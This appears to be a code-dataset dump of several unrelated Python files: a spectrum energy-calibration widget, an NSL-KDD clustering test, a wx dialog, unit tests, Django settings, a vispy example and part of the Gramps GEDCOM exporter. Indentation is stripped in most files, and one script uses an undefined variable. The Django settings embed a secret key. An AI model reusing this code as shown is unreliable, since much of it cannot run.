self.splitter.setOrientation(qt.Qt.Horizontal)
self.splitter.setHandleWidth(5)
self.splitter.setStretchFactor(1, 2)
self.splitter.addWidget(self._lsWidget)
self.splitter.addWidget(self._rsWidget)
self._mainLayout = qt.QHBoxLayout()
self._mainLayout.addWidget(self.splitter)
self.setLayout(self._mainLayout)
return 0
def connect_signals(self):
self._sourceWidget.sigAddSelection.connect(
self._plotSpectraWindow._addSelection)
self._sourceWidget.sigRemoveSelection.connect(
self._plotSpectraWindow._removeSelection)
self._sourceWidget.sigReplaceSelection.connect(
self._plotSpectraWindow._replaceSelection)
self.autoscaleGaussianCheckBox.stateChanged.connect(
self.autoscaleGaussianChanged)
self._sourceWidget.sigAddSelection.connect(self._positionMarkers)
self._sourceWidget.sigAddSelection.connect(self._selectionchanged)
self._sourceWidget.sigReplaceSelection.connect(self._selectionchanged)
self._exportWidget.OutputFileSelected.connect(self._enableSaveButton)
self.showGaussianCheckBox.stateChanged.connect(self.gaussianOnOff)
self._ezeroSpinBox.intersectionsChangedSignal.connect(self.zeroEnergyChanged)
self._ezeroSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True))
self.GaussianWidthSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True))
self.GaussianHeightSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True))
self._sourceWidget.sigReplaceSelection.connect(lambda: self.zeroEnergyChanged(replot=True))
return 0
def zeroEnergyChanged(self, replot=False):
if self.showGaussianCheckBox.isChecked():
ezero = self._ezeroSpinBox.value()
gwidth = self.GaussianWidthSpinBox.value()
gheight = self.GaussianHeightSpinBox.value()
if self.autoscaleGaussianCheckBox.isChecked():
curves = [c for c in
self._plotSpectraWindow.getAllCurves(just_legend=True)
if not c.startswith('Gaussian')]
if len(curves):
x, y = self._plotSpectraWindow.getCurve(curves[0])[:2]
gheight = y[np.abs(x - ezero).argsort()][:5].mean()
self.GaussianHeightSpinBox.setValue(gheight)
gaussianX = np.linspace(ezero-3*gwidth, ezero+3*gwidth, 100)
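            # 2.3548 ~ 2*sqrt(2*ln 2), converting the FWHM spin box value to
            # the Gaussian standard deviation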
gaussianY = gheight * np.exp(-(gaussianX-ezero)**2/(2*(gwidth/2.3548)**2))
self._plotSpectraWindow.addCurve(
gaussianX, gaussianY, 'Gaussian', ylabel=' ', replot=replot)
def gaussianOnOff(self):
if self.showGaussianCheckBox.isChecked():
self.GaussianWidthSpinBox.setEnabled(True)
if not self.autoscaleGaussianCheckBox.isChecked():
self.GaussianHeightSpinBox.setEnabled(True)
self.autoscaleGaussianCheckBox.setEnabled(True)
self.zeroEnergyChanged(replot=True)
else:
self.GaussianWidthSpinBox.setEnabled(False)
self.GaussianHeightSpinBox.setEnabled(False)
self.autoscaleGaussianCheckBox.setEnabled(False)
self._plotSpectraWindow.removeCurve('Gaussian ')
def autoscaleGaussianChanged(self):
if self.autoscaleGaussianCheckBox.isChecked():
self.GaussianHeightSpinBox.setEnabled(False)
else:
self.GaussianHeightSpinBox.setEnabled(True)
def _enableSaveButton(self):
self.saveButton.setEnabled(True)
self.saveButton.setToolTip(None)
def _positionMarkers(self):
if not self._markersPositioned:
limits = self._plotSpectraWindow.getGraphXLimits()
self._ezeroSpinBox.setValue(0.5 * (limits[1]+limits[0]))
self._markersPositioned = True
def _selectionchanged(self):
self.scansCalibrated = False
self.calibrateButton.setEnabled(True)
def calibrateButtonClicked(self):
llist = self._plotSpectraWindow.getAllCurves()
# Align scans
self.calibratedScans = []
oldlegends = []
sourcenames = [s.sourceName for s in self._sourceWidget.sourceList]
for i, scan in enumerate(llist):
x, y, legend, scaninfo = scan[:4]
if 'SourceName' not in scaninfo or legend.rstrip().endswith('ENE') \
or legend=='Gaussian ':
continue
sourceindex = sourcenames.index(scaninfo['SourceName'])
dataObject = self._sourceWidget.sourceList[sourceindex].getDataObject(scaninfo['Key'])
newdataObject = copy.deepcopy(dataObject)
xindex = scaninfo['selection']['x'][0]
yindex = scaninfo['selection']['y'][0]
newx = x - self._ezeroSpinBox.value()
newx *= self._ecalibSpinBox.value() * 1e-3
oldlegends.append(legend)
newlegend = ''.join([legend, ' ENE'])
scaninfo['Ezero'] = self._ezeroSpinBox.value()
scaninfo['Ecalib'] = self._ecalibSpinBox.value()
scaninfo['oldKey'] = newdataObject.info['Key']
scaninfo['oldX'] = scaninfo['selection']['cntlist'][
scaninfo['selection']['x'][0]]
self._plotSpectraWindow.addCurve(
newx, y, newlegend, scaninfo,
xlabel='Energy',
ylabel='',
replot=False)
self._plotSpectraWindow.setGraphXLabel('Energy')
self._plotSpectraWindow.removeCurves(oldlegends)
self._plotSpectraWindow.resetZoom()
self.scansCalibrated = True
self.calibrateButton.setDisabled(True)
if not self._exportWidget._folderLineEdit.text() == '':
self.saveButton.setEnabled(True)
return
def saveButtonClicked(self):
curves = self._plotSpectraWindow.getAllCurves()
dataObjects2save = []
sourcenames = [s.sourceName[0] for s in self._sourceWidget.sourceList]
        for curve in curves:
            x, y, legend, info = curve[:4]
            if not legend.rstrip().endswith('ENE'):
                continue
sourceindex = sourcenames.index(info['FileName'])
dataObject = self._sourceWidget.sourceList[sourceindex].getDataObject(info['oldKey'])
newdataObject = copy.deepcopy(dataObject)
xindex = newdataObject.info['LabelNames'].index(info['oldX'])
escale = newdataObject.data[:, xindex] - self._ezeroSpinBox.value()
escale *= self._ecalibSpinBox.value() * 1e-3
if newdataObject.info['LabelNames'].count('Energy') > 0:
ene_index = newdataObject.info['LabelNames'].index('Energy')
newdataObject.data = np.vstack(
[newdataObject.data[:,:ene_index].T, escale, newdataObject.data[:, ene_index+1:].T]).T
else:
newdataObject.data = np.vstack(
[newdataObject.data[:,0], escale, newdataObject.data[:, 1:].T]).T
newdataObject.info['LabelNames'] = newdataObject.info['LabelNames'][:1] + \
['Energy'] + newdataObject.info['LabelNames'][1:]
newdataObject.info['Command'] = '%s - energy calibrated' % (
info['Command'])
header = []
header.append('#D %s\n' % time.strftime('%Y-%m-%d %H:%M:%S',
time.localtime(time.time())))
for hline in newdataObject.info['Header']:
if hline.startswith('#D'):
continue
if hline.startswith('#N'):
continue
if hline.startswith('#L'):
continue
header.append(hline)
header.append('#C Parameters for energy calibration')
header.append('#C Ezero: %s %s' % (info['Ezero'], info['oldX']))
header.append('#C Ecalib: %s meV / %s' % (info['Ecalib'], info['oldX']))
header.append('#C ')
header.append('#N %d' % (len(newdataObject.info['LabelNames'])))
header.append('#L %s' % (' '.join(newdataObject.info['LabelNames'])))
newdataObject.info['Header'] = header
dataObjects2save.append(newdataObject)
specfilename = self._exportWidget.outputFile
if not os.path.isfile(specfilename):
with open('%s' % (specfilename), 'wb+') as f:
fileheader = '#F %s\n\n' % (specfilename)
f.write(fileheader.encode('ascii'))
scannumber = 1
else:
keys = SpecFileDataSource(specfilename).getSourceInfo()['KeyList']
scans = [int(k.split('.')[0]) for k in keys]
scannumber = max(scans) + 1
for dataObject in dataObjects2save:
output = []
command = dataObject.info['Command']
if self._exportWidget.askForScanName():
command = self._exportWidget.getScanName(command)
if not command:
command = dataObject.info['Command']
output.append('#S %d %s\n' % (scannumber, command))
header = dataObject.info['Header']
for item in header:
if item.startswith('#S'):
continue
output.append(''.join([item, '\n']))
output.append(''.join('%s\n' % (' '.join([str(si) for si in s]))
for s in dataObject.data.tolist()))
output.append('\n')
with open('%s' % (specfilename), 'ab+') as f:
f.write(''.join(output).encode('ascii'))
print('Spectrum saved to \"%s\"' % (specfilename))
key = SpecFileDataSource(specfilename).getSourceInfo()['KeyList'][-1]
if self._exportWidget._datCheckBox.isChecked():
command = command.replace(':','_').replace(' ', '_')
            # str.rstrip('.spec') would strip any trailing '.', 's', 'p',
            # 'e', 'c' characters, so remove the extension properly instead
            datdirname = os.path.splitext(specfilename)[0]
            if not os.path.isdir(datdirname):
                os.mkdir(datdirname)
            datfilename = '%s/S%04d_%s_%s.dat' % (
                datdirname, scannumber,
                key.split('.')[-1], command)
np.savetxt('%s' % (datfilename), dataObject.data)
print('Spectrum saved to \"%s\"\n' % (datfilename))
#~ scannumber +=1
self.saveButton.setDisabled(True)
if __name__ == "__main__":
import numpy as np
app = qt.QApplication([])
app.lastWindowClosed.connect(app.quit)
w = MainWindow()
w.show()
app.exec_()
| mit | -7,016,220,558,226,067,000 | 40.281188 | 106 | 0.598258 | false |
zedoul/AnomalyDetection | test_discretization/test_scikit_sc.py | 1 | 3101 | # -*- coding: utf-8 -*-
"""
http://www.astroml.org/sklearn_tutorial/dimensionality_reduction.html
"""
print (__doc__)
import numpy as np
import copy
from sklearn import cluster
from sklearn.cluster import KMeans
from sklearn.cluster import k_means
from sklearn.manifold import spectral_embedding
from sklearn.utils import check_random_state
import nslkdd.preprocessing as preprocessing
import sugarbee.reduction as reduction
import sugarbee.distance as distance
import sugarbee.affinity as affinity
import sugarbee.solver as solver
import scipy.sparse as sparse
import scipy.sparse.csgraph as csgraph
#def assign_undirected_weight(W, i, j, v):
# W[i,j] = W[j,i] = v
if __name__ == '__main__':
import time
start = time.time()
datasize = 1000
print "preprocessing data..."
df, headers = preprocessing.get_preprocessed_data(datasize)
df_train = copy.deepcopy(df)
df_train.drop('attack',1,inplace=True)
df_train.drop('difficulty',1,inplace=True)
print "normal"
print len(df[df["attack"] == 11])
print "abnormal"
print len(df[df["attack"] != 11])
print "data reduction..."
proj = reduction.reduction(df_train, n_components=1)
print "graph generation..."
A = affinity.get_affinity_matrix(proj, metric_method=distance.gaussian,knn=200)
# A = affinity.get_affinity_matrix(proj, metric_method=distance.dist, metric_param='euclidean', knn=8)
# A = affinity.get_affinity_matrix(proj, metric_method=distance.dist, metric_param='manhattan', knn=8)
# A = affinity.get_affinity_matrix(proj, metric_method=distance.cosdist,knn=8)
D = affinity.get_degree_matrix(A)
L = affinity.get_laplacian_matrix(A,D)
print "data clustering..."
Abin = None
if sparse.isspmatrix(L):
Abin = sparse.csc_matrix(L).sign()
else:
Abin = np.sign(L)
numConn, connMap = csgraph.connected_components(Abin, directed = False)
numClusters = numConn
spectral = cluster.SpectralClustering(n_clusters = numClusters,
affinity = "precomputed")
y_spectral = spectral.fit_predict(A)
res = y_spectral
print "analyzing result..."
t = df["attack"].values.tolist()
f = df["difficulty"].values.tolist()
print res[:10]
print t[:10]
print f[:10]
# t : 11, normal
# t : otherwise abnormal
true_positive = 0
true_negative = 0
false_positive = 0
false_negative = 0
trueclass = 0
for i in range(datasize):
if t[i] == 11 and res[i] == trueclass:
true_positive = true_positive + 1
if t[i] != 11 and res[i] == trueclass:
false_positive = false_positive + 1
if t[i] != 11 and res[i] != trueclass:
true_negative = true_negative + 1
if t[i] == 11 and res[i] != trueclass:
false_negative = false_negative + 1
print true_positive
print true_negative
print false_positive
print false_negative
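    # Derived metrics (illustrative addition, not in the original script):
    # precision and recall of the "normal" cluster from the counts above.
    if true_positive + false_positive and true_positive + false_negative:
        precision = float(true_positive) / (true_positive + false_positive)
        recall = float(true_positive) / (true_positive + false_negative)
        print "precision %.3f recall %.3f" % (precision, recall)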
elapsed = (time.time() - start)
print "done in %s seconds" % (elapsed)
tttt = 0
for zzz in est.labels_:
if zzz == trueclass :
tttt = tttt + 1
print tttt
| mit | 1,723,285,607,583,526,000 | 28.254717 | 105 | 0.64979 | false |
turdusmerula/kipartman | kipartman/dialogs/dialog_main.py | 1 | 3486 | # -*- coding: utf-8 -*-
###########################################################################
## Python code generated with wxFormBuilder (version Dec 18 2018)
## http://www.wxformbuilder.org/
##
## PLEASE DO *NOT* EDIT THIS FILE!
###########################################################################
import wx
import wx.xrc
###########################################################################
## Class DialogMain
###########################################################################
class DialogMain ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Kipartman", pos = wx.DefaultPosition, size = wx.Size( 1160,686 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
self.menu_bar = wx.MenuBar( 0 )
self.menu_file = wx.Menu()
self.menu_file_project = wx.MenuItem( self.menu_file, wx.ID_ANY, u"Open project", wx.EmptyString, wx.ITEM_NORMAL )
self.menu_file.Append( self.menu_file_project )
self.menu_file.AppendSeparator()
self.menu_buy_parts = wx.MenuItem( self.menu_file, wx.ID_ANY, u"Buy parts", u"Open the buy parts window", wx.ITEM_NORMAL )
self.menu_file.Append( self.menu_buy_parts )
self.menu_bar.Append( self.menu_file, u"File" )
self.menu_view = wx.Menu()
self.menu_view_configuration = wx.MenuItem( self.menu_view, wx.ID_ANY, u"Configuration", wx.EmptyString, wx.ITEM_NORMAL )
self.menu_view.Append( self.menu_view_configuration )
self.menu_bar.Append( self.menu_view, u"View" )
self.menu_help = wx.Menu()
self.menu_about = wx.MenuItem( self.menu_help, wx.ID_ANY, u"About", wx.EmptyString, wx.ITEM_NORMAL )
self.menu_help.Append( self.menu_about )
self.menu_bar.Append( self.menu_help, u"Help" )
self.SetMenuBar( self.menu_bar )
bSizer5 = wx.BoxSizer( wx.VERTICAL )
self.info = wx.InfoBar( self )
self.info.SetShowHideEffects( wx.SHOW_EFFECT_NONE, wx.SHOW_EFFECT_NONE )
self.info.SetEffectDuration( 500 )
bSizer5.Add( self.info, 0, wx.ALL|wx.EXPAND, 5 )
self.notebook = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )
bSizer5.Add( self.notebook, 1, wx.EXPAND |wx.ALL, 5 )
self.SetSizer( bSizer5 )
self.Layout()
self.status = self.CreateStatusBar( 1, wx.STB_SIZEGRIP, wx.ID_ANY )
self.Centre( wx.BOTH )
# Connect Events
self.Bind( wx.EVT_KILL_FOCUS, self.onKillFocus )
self.Bind( wx.EVT_MENU, self.onMenuFileProjetSelection, id = self.menu_file_project.GetId() )
self.Bind( wx.EVT_MENU, self.onMenuBuyPartsSelection, id = self.menu_buy_parts.GetId() )
self.Bind( wx.EVT_MENU, self.onMenuViewConfigurationSelection, id = self.menu_view_configuration.GetId() )
self.Bind( wx.EVT_MENU, self.onMenuHelpAboutSelection, id = self.menu_about.GetId() )
self.notebook.Bind( wx.EVT_NOTEBOOK_PAGE_CHANGED, self.onNotebookPageChanged )
self.notebook.Bind( wx.EVT_NOTEBOOK_PAGE_CHANGING, self.onNotebookPageChanging )
def __del__( self ):
pass
	# Virtual event handlers, override them in your derived class
def onKillFocus( self, event ):
event.Skip()
def onMenuFileProjetSelection( self, event ):
event.Skip()
def onMenuBuyPartsSelection( self, event ):
event.Skip()
def onMenuViewConfigurationSelection( self, event ):
event.Skip()
def onMenuHelpAboutSelection( self, event ):
event.Skip()
def onNotebookPageChanged( self, event ):
event.Skip()
def onNotebookPageChanging( self, event ):
event.Skip()
| gpl-3.0 | -5,311,697,587,579,618,000 | 32.84466 | 177 | 0.647734 | false |
dahiro/shotgun-replica | shotgun_replica/python/tests/shotgun_replica_tests/utilities/test_entityNaming.py | 1 | 3045 | # -*- coding: utf-8 -*-
'''
Created on 21.05.2012
@author: bach
'''
import unittest
from shotgun_replica.utilities import entityNaming
class Test( unittest.TestCase ):
def setUp( self ):
pass
def tearDown( self ):
pass
def testUnderScoreReplacement( self ):
testPairs = [
( "shoot_days", "ShootDays", True ),
( "_shoot_days", "ShootDays", False ),
]
for ( underscored, capitalized, needsInverse ) in testPairs:
replacedCapitalized = entityNaming.replaceUnderscoresWithCapitals( underscored )
self.assertEqual( replacedCapitalized, capitalized )
if needsInverse:
replacedUnderscored = entityNaming.replaceCapitalsWithUnderscores( capitalized )
self.assertEqual( replacedUnderscored, underscored )
def testConnectionEntityName( self ):
testPairs = [
( "Asset", "assets", "AssetAssetConnection" ),
( "Asset", "sg_linked_assets", "Asset_sg_linked_assets_Connection" ),
( "Asset", "sg_linked_shots", "Asset_sg_linked_shots_Connection" ),
( "Asset", "shoot_days", "AssetShootDayConnection" )
]
for ( entityType, attrName, connectionEntityName ) in testPairs:
connEntityNameTesting = entityNaming.getConnectionEntityName( entityType, attrName )
self.assertEqual( connEntityNameTesting, connectionEntityName )
def testConnectionAttrNames( self ):
testPairs = [
( "Asset", "Asset", "AssetAssetConnection", "asset", "parent" ),
( "Asset", "Shot", "AssetShotConnection", "asset", "shot" ),
( "CustomEntity07", "CustomEntity05", "CustomEntity07_sg_sources_Connection", "custom_entity07", "custom_entity05" ),
( "Revision", "Revision", "RevisionRevisionConnection", "source_revision", "dest_revision"),
]
for ( baseEntityType, linkedEntityType, connEntityName, srcAttrName, destAttrName ) in testPairs:
( srcAttrNameTest, destAttrNameTest ) = entityNaming.getConnectionEntityAttrName( baseEntityType,
linkedEntityType,
connEntityName )
self.assertEqual( srcAttrNameTest, srcAttrName )
self.assertEqual( destAttrNameTest, destAttrName )
def testRetAttributeNames( self ):
testPairs = [
( "Asset", "sg_linked_assets", "asset_sg_linked_assets_assets" ),
( "CustomEntity02", "sg_sink_tasks", "custom_entity02_sg_sink_tasks_custom_entity02s" ),
]
for ( entityType, attrName, retAttrName ) in testPairs:
retAttrNameTest = entityNaming.getReverseAttributeName( entityType, attrName )
self.assertEqual( retAttrNameTest, retAttrName )
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| bsd-3-clause | 7,776,669,194,021,604,000 | 41.887324 | 129 | 0.598686 | false |
vodkasoft/CanYouSinkMe | backend/util/encoding.py | 1 | 1632 | #!/usr/bin/env python
# Copyright 2014 Vodkasoft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from json import dumps
def encode_json(data, pretty):
""" Formats an object as JSON
Parameters:
:param data: data the will be encoded
:param pretty: whether the output should be human readable or not
Returns:
:return: data encoded as JSON
"""
if pretty:
return __format_as_pretty_json(data)
else:
return __format_as_compact_json(data)
def __format_as_pretty_json(data):
""" Encodes an object as JSON that is human readable
Parameters:
:param data: data that will be encoded
Returns:
:return: data encoded in a human readable JSON format
"""
return dumps(data, sort_keys=True, indent=4, separators=(',', ': '))
def __format_as_compact_json(data):
""" Encodes an object as JSON with the least amount of characters
Parameters:
:param data: data that will be encoded
Returns:
:return: data encoded in a compact JSON format
"""
return dumps(data, separators=(',', ':'))
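# Example usage (illustrative only, not part of the original module):
# encode_json({"a": 1}, pretty=False) -> '{"a":1}'
# encode_json({"b": 2, "a": 1}, pretty=True) -> keys sorted, 4-space indented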
| apache-2.0 | 2,793,066,812,018,815,000 | 27.137931 | 74 | 0.669118 | false |
ayazmaroof/Yscrape | yelpsite/yelpsite/settings.py | 1 | 2059 | """
Django settings for yelpsite project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'g#o84!cbq0&27c+qw9xl6nakxui40v$ml)ex!-1jvr)!%m+6s7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'yelpsite.urls'
WSGI_APPLICATION = 'yelpsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Singapore'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| mit | 7,521,403,698,506,085,000 | 23.807229 | 71 | 0.728023 | false |
Eric89GXL/vispy | examples/basics/scene/linear_region.py | 2 | 2298 | # -*- coding: utf-8 -*-
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""
Demonstration of the LinearRegion visual.
"""
import sys
import numpy as np
from vispy import app, scene
# vertex positions of data to draw
N = 200
pos = np.zeros((N, 2), dtype=np.float32)
x_lim = [50., 750.]
y_lim = [-2., 2.]
pos[:, 0] = np.linspace(x_lim[0], x_lim[1], N)
pos[:, 1] = np.random.normal(size=N)
# color array
color = np.ones((N, 4), dtype=np.float32)
color[:, 0] = np.linspace(0, 1, N)
color[:, 1] = color[::-1, 0]
canvas = scene.SceneCanvas(keys='interactive', show=True)
grid = canvas.central_widget.add_grid(spacing=0)
viewbox = grid.add_view(row=0, col=1, camera='panzoom')
# add some axes
x_axis = scene.AxisWidget(orientation='bottom')
x_axis.stretch = (1, 0.1)
grid.add_widget(x_axis, row=1, col=1)
x_axis.link_view(viewbox)
y_axis = scene.AxisWidget(orientation='left')
y_axis.stretch = (0.1, 1)
grid.add_widget(y_axis, row=0, col=0)
y_axis.link_view(viewbox)
# add a line plot inside the viewbox
line = scene.Line(pos, color, parent=viewbox.scene)
# add vertical regions
color = np.array([[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[0.0, 0.0, 1.0, 1.0],
[0.0, 1.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 0.0, 1.0]])
pos = np.array([100, 120, 140, 160, 180, 200], dtype=np.float32)
vert_region1 = scene.LinearRegion(pos, color,
parent=viewbox.scene)
vert_region2 = scene.LinearRegion([549.2, 700], [0.0, 1.0, 0.0, 0.5],
vertical=True,
parent=viewbox.scene)
# add horizontal regions
pos = np.array([0.3, 0.0, -0.1], dtype=np.float32)
hor_region1 = scene.LinearRegion(pos, [1.0, 0.0, 0.0, 0.5],
vertical=False,
parent=viewbox.scene)
hor_region2 = scene.LinearRegion([-5.1, -2.0], [0.0, 0.0, 1.0, 0.5],
vertical=False,
parent=viewbox.scene)
# auto-scale to see the whole line.
viewbox.camera.set_range()
if __name__ == '__main__' and sys.flags.interactive == 0:
app.run()
| bsd-3-clause | 8,837,949,601,075,203,000 | 29.64 | 73 | 0.563098 | false |
jralls/gramps | gramps/plugins/export/exportgedcom.py | 1 | 59838 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2008 Brian G. Matherly
# Copyright (C) 2008-2009 Gary Burton
# Copyright (C) 2008 Robert Cheramy <[email protected]>
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2010 Nick Hall
# Copyright (C) 2011 Tim G L Lyons
# Copyright (C) 2012 Doug Blank <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"Export to GEDCOM"
#-------------------------------------------------------------------------
#
# Standard Python Modules
#
#-------------------------------------------------------------------------
import os
import time
#-------------------------------------------------------------------------
#
# Gramps modules
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
from gramps.gen.lib import (AttributeType, ChildRefType, Citation, Date,
EventRoleType, EventType, LdsOrd, NameType,
PlaceType, NoteType, Person, UrlType)
from gramps.version import VERSION
import gramps.plugins.lib.libgedcom as libgedcom
from gramps.gen.errors import DatabaseError
from gramps.gen.updatecallback import UpdateCallback
from gramps.gen.utils.file import media_path_full
from gramps.gen.utils.place import conv_lat_lon
from gramps.gen.utils.location import get_main_location
from gramps.gen.display.place import displayer as _pd
#-------------------------------------------------------------------------
#
# GEDCOM tags representing attributes that may take a parameter, value or
# description on the same line as the tag
#
#-------------------------------------------------------------------------
NEEDS_PARAMETER = set(
["CAST", "DSCR", "EDUC", "IDNO", "NATI", "NCHI",
"NMR", "OCCU", "PROP", "RELI", "SSN", "TITL"])
LDS_ORD_NAME = {
LdsOrd.BAPTISM : 'BAPL',
LdsOrd.ENDOWMENT : 'ENDL',
LdsOrd.SEAL_TO_PARENTS : 'SLGC',
LdsOrd.SEAL_TO_SPOUSE : 'SLGS',
LdsOrd.CONFIRMATION : 'CONL',
}
LDS_STATUS = {
LdsOrd.STATUS_BIC : "BIC",
LdsOrd.STATUS_CANCELED : "CANCELED",
LdsOrd.STATUS_CHILD : "CHILD",
LdsOrd.STATUS_CLEARED : "CLEARED",
LdsOrd.STATUS_COMPLETED : "COMPLETED",
LdsOrd.STATUS_DNS : "DNS",
LdsOrd.STATUS_INFANT : "INFANT",
LdsOrd.STATUS_PRE_1970 : "PRE-1970",
LdsOrd.STATUS_QUALIFIED : "QUALIFIED",
LdsOrd.STATUS_DNS_CAN : "DNS/CAN",
LdsOrd.STATUS_STILLBORN : "STILLBORN",
LdsOrd.STATUS_SUBMITTED : "SUBMITTED",
LdsOrd.STATUS_UNCLEARED : "UNCLEARED",
}
LANGUAGES = {
'cs' : 'Czech', 'da' : 'Danish', 'nl' : 'Dutch', 'en' : 'English',
'eo' : 'Esperanto', 'fi' : 'Finnish', 'fr' : 'French', 'de' : 'German',
'hu' : 'Hungarian', 'it' : 'Italian', 'lt' : 'Latvian',
'lv' : 'Lithuanian', 'no' : 'Norwegian', 'po' : 'Polish',
'pt' : 'Portuguese', 'ro' : 'Romanian', 'sk' : 'Slovak',
'es' : 'Spanish', 'sv' : 'Swedish', 'ru' : 'Russian', }
#-------------------------------------------------------------------------
#
#
#
#-------------------------------------------------------------------------
MIME2GED = {
"image/bmp" : "bmp",
"image/gif" : "gif",
"image/jpeg" : "jpeg",
"image/x-pcx" : "pcx",
"image/tiff" : "tiff",
"audio/x-wav" : "wav"
}
QUALITY_MAP = {
Citation.CONF_VERY_HIGH : "3",
Citation.CONF_HIGH : "2",
Citation.CONF_LOW : "1",
Citation.CONF_VERY_LOW : "0",
}
PEDIGREE_TYPES = {
ChildRefType.BIRTH : 'birth',
ChildRefType.STEPCHILD: 'Step',
ChildRefType.ADOPTED : 'Adopted',
ChildRefType.FOSTER : 'Foster',
}
NOTES_PER_PERSON = 104 # fudge factor to make progress meter a bit smoother
#-------------------------------------------------------------------------
#
# sort_handles_by_id
#
#-------------------------------------------------------------------------
def sort_handles_by_id(handle_list, handle_to_object):
"""
Sort a list of handles by the Gramps ID.
The function that returns the object from the handle needs to be supplied
so that we get the right object.
"""
sorted_list = []
for handle in handle_list:
obj = handle_to_object(handle)
if obj:
data = (obj.get_gramps_id(), handle)
sorted_list.append(data)
sorted_list.sort()
return sorted_list
#-------------------------------------------------------------------------
#
# breakup
#
#-------------------------------------------------------------------------
def breakup(txt, limit):
"""
Break a line of text into a list of strings that conform to the
maximum length specified, while breaking words in the middle of a word
to avoid issues with spaces.
"""
if limit < 1:
raise ValueError("breakup: unexpected limit: %r" % limit)
data = []
while len(txt) > limit:
# look for non-space pair to break between
# do not break within a UTF-8 byte sequence, i. e. first char >127
idx = limit
while (idx > 0 and (txt[idx - 1].isspace() or txt[idx].isspace() or
ord(txt[idx - 1]) > 127)):
idx -= 1
if idx == 0:
#no words to break on, just break at limit anyway
idx = limit
data.append(txt[:idx])
txt = txt[idx:]
if len(txt) > 0:
data.append(txt)
return data
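# Illustrative example (not in the original source): breakup("abcdefghij", 4)
# returns ["abcd", "efgh", "ij"]; the backtracking above moves the split away
# from spaces and non-ASCII characters so CONC continuations rejoin cleanly.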
#-------------------------------------------------------------------------
#
# event_has_subordinate_data
# may want to compare description w/ auto-generated one, and
# if so, treat it same as if it were empty for this purpose
#
#-------------------------------------------------------------------------
def event_has_subordinate_data(event, event_ref):
""" determine if event is empty or not """
if event and event_ref:
return (event.get_description().strip() or
not event.get_date_object().is_empty() or
event.get_place_handle() or
event.get_attribute_list() or
event_ref.get_attribute_list() or
event.get_note_list() or
event.get_citation_list() or
event.get_media_list())
else:
return False
#-------------------------------------------------------------------------
#
# GedcomWriter class
#
#-------------------------------------------------------------------------
class GedcomWriter(UpdateCallback):
"""
The GEDCOM writer creates a GEDCOM file that contains the exported
information from the database. It derives from UpdateCallback
so that it can provide visual feedback via a progress bar if needed.
"""
def __init__(self, database, user, option_box=None):
UpdateCallback.__init__(self, user.callback)
self.dbase = database
self.dirname = None
self.gedcom_file = None
self.progress_cnt = 0
self.setup(option_box)
def setup(self, option_box):
"""
If the option_box is present (GUI interface), then we check the
"private", "restrict", and "cfilter" arguments to see if we need
to apply proxy databases.
"""
if option_box:
option_box.parse_options()
